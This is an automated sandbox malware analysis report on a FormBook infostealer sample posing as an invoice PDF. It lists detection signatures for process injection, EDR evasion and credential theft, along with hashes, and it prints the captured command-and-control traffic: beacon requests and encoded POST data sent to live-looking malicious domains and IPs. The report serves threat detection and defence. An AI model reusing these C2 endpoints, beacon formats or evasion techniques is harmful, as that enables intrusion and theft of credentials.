Windows Analysis Report
ORIGINAL INVOICE COAU7230734298.pdf.exe

Overview

General Information

Sample name: ORIGINAL INVOICE COAU7230734298.pdf.exe
Analysis ID: 1523775
MD5: 7d3ee1a73d9fbef171c785801ffcaff2
SHA1: 2ad9a95c9038e4d61c6d9cbee63746454454d502
SHA256: 1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
Tags: exeuser-ngokoptmp
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Virustotal: Detection: 38% Perma Link
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose, 8_2_0327C000
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then xor eax, eax 8_2_03269B70
Source: C:\Windows\SysWOW64\RpcPing.exe Code function: 4x nop then mov ebx, 00000004h 8_2_03D304DE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then pop edi 9_2_058C2FA0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then xor eax, eax 9_2_058C7839
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 4x nop then pop edi 9_2_058D2ACE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56830 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56834 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56825 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56835 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56827 -> 85.159.66.93:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56833 -> 52.223.13.41:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56829 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56831 -> 185.106.176.204:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56826 -> 85.159.66.93:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.kartal-nakliyat.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.223.13.41 52.223.13.41
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
Source: Joe Sandbox View ASN Name: AS_LYREG3FR AS_LYREG3FR
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.yippie.worldUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.kartal-nakliyat.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.sidqwdf.funUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic HTTP traffic detected: GET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.resellnexa.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic DNS traffic detected: DNS query: www.yippie.world
Source: global traffic DNS traffic detected: DNS query: www.kartal-nakliyat.xyz
Source: global traffic DNS traffic detected: DNS query: www.sidqwdf.fun
Source: global traffic DNS traffic detected: DNS query: www.resellnexa.shop
Source: unknown HTTP traffic detected: POST /n8ew/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeCache-Control: max-age=0Content-Length: 199Content-Type: application/x-www-form-urlencodedHost: www.kartal-nakliyat.xyzOrigin: http://www.kartal-nakliyat.xyzReferer: http://www.kartal-nakliyat.xyz/n8ew/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)Data Raw: 2d 4c 3d 56 70 73 65 45 75 30 4c 65 37 53 74 58 78 4b 66 4e 68 69 6b 35 6e 78 2b 2b 5a 67 49 52 53 78 43 53 64 69 4f 52 38 32 56 76 6d 47 48 76 65 4f 33 70 42 54 37 52 58 63 2b 63 39 76 54 69 6f 4f 45 78 70 2f 55 6d 4c 69 4b 71 35 71 69 64 56 46 56 45 67 64 62 34 4c 51 74 4c 44 6b 6d 37 4b 50 46 55 71 32 62 31 37 45 4d 62 67 79 6b 77 35 38 42 74 4b 2f 33 49 51 32 75 54 50 31 52 56 7a 38 2b 47 63 44 6e 48 54 6c 4a 73 32 71 64 41 31 62 4f 6a 77 75 57 39 4c 69 46 33 47 50 6b 32 4a 6b 67 72 59 2f 6a 59 5a 64 68 35 6f 75 2b 6d 61 45 61 55 4e 71 4d 41 78 79 4c 6b 67 43 64 7a 51 4f 6b 72 51 3d 3d Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 02 Oct 2024 00:06:34 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:44 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693090420.0000000005A07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlru-ru
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
